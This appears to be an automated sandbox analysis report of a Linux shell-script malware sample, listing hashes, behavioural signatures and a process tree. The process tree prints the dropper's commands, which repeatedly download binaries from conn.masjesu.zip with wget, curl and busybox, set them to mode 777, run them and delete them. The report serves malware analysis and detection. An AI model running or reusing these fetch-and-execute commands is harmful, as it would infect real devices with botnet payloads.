Analysis
-
max time kernel
81s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
-
Size
10KB
-
MD5
4ea5706fdd75f148d2bf38bc0ca8bf54
-
SHA1
57a2af30643d8facb455bb90086386308bdbb582
-
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
-
SHA512
a5c858e9af5b42bd2697b799f540c3b6530a4ec5380ce173d60ec5beca09f09415ee0d614f4aa71a45fc2bb557c8293c214856b055e07317d64045d5959448f3
-
SSDEEP
96:YmWF4N4N4fw0n3LiLBoBkBoiYo75v5D5oP3uZLCaLsLJ6JyJDyunue0EQEMEQddm:yW8Q137Qdd3Ak8YHqa437Qddv8YHqa56
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 878 chmod 948 chmod 810 chmod 847 chmod 899 chmod 934 chmod 962 chmod 1004 chmod 780 chmod 892 chmod 969 chmod 983 chmod 990 chmod 857 chmod 864 chmod 920 chmod 871 chmod 941 chmod 997 chmod 737 chmod 913 chmod 885 chmod 906 chmod 927 chmod 955 chmod 976 chmod 744 chmod 753 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 738 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 745 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 755 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 781 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 811 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 848 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 858 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 865 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 872 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 879 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 886 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 893 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 900 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 907 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 914 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 921 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 928 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 935 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 942 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 949 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 956 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 963 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 970 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 977 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 984 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 991 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 998 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 1005 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 863 busybox 959 curl 760 wget 909 wget 940 busybox 968 busybox 989 busybox 794 curl 952 curl 979 wget 980 curl 785 wget 891 busybox 895 wget 919 busybox 747 wget 850 wget 853 busybox 917 curl 905 busybox 748 curl 807 busybox 860 wget 861 curl 884 busybox 710 wget 898 busybox 987 curl 844 busybox 958 wget 836 curl 1001 curl 986 wget 994 curl 741 curl 764 curl 881 wget 938 curl 951 wget 973 curl 743 busybox 851 curl 888 wget 889 curl 910 curl 875 curl 930 wget 933 busybox 945 curl 975 busybox 916 wget 937 wget 944 wget 740 wget 877 busybox 882 curl 902 wget 903 curl 954 busybox 996 busybox 1000 wget 947 busybox 961 busybox 993 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl
Processes
-
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:710
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:736
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:750
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:758
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:760
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:771
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:781
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:784
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:870
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:912
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:926
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:943
-
-
